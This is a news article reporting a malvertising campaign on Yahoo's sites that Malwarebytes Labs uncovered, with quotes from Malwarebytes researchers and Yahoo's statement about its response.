Last week, users who were on any of Yahoo’s sites – news, gaming or finance- were infected with malware, regardless of whether they clicked it.
Security company Malwarebytes Labs uncovered this, publishing it on its blog on Monday. By then, Yahoo had taken action to stop the malvertising campaign.
According to data from SimilarWeb, Yahoo!’s website has an estimated 6.9 billion visits per month, making it “one of the largest malvertising attacks we have seen recently,” said Malwarebytes Labs.
Jérôme Segura, a senior security researcher at Malwarebytes said that the attack began when AdJuggler, a trusted advertiser and partner of Yahoo for ad distribution, “got abused by rogue advertisers that uploaded a malicious ad that got displayed on the main site.”
When people were browsing the site, the ad automatically — without any type of user interaction — would silently load malicious code into the background and attempt to infect the computer with a piece of malware, added Segura in an article on Silicon Beat.
Yahoo quickly acted, later issuing a statement:
“Yahoo is committed to ensuring that both our advertisers and users have a safe and reliable experience. As soon as we learned of this issue, our team took action and will continue to investigate this issue.
Unfortunately, disruptive ad behavior affects the entire tech industry. Yahoo has a long history of engagement on this issue and is committed to working with our peers to create a secure advertising experience. We’ll continue to ensure the quality and safety of our ads through our automated testing and through the SafeFrame working group, which seeks to protect consumers and publishers from the potential security risks inherent in the online ad ecosystem.”
“Malvertising is a silent killer because malicious ads do not require any type of user interaction in order to execute their payload. The mere fact of browsing to a website that has adverts (and most sites, if not all, do) is enough to start the infection chain,” said Malwarebytes Labs in its blog.
In 2014, Malwarebytes Labs also announced that it had uncovered that Google Doubleclick had been hit by hackers in a malvertising attack as well.
According to a Forbes article, cyber criminals made an estimated US$25,000 a day by forcing a host of big name websites, including Yahoo and AOL, by getting these to infect users’ PCs with malware, serving ads from compromised advertising networks.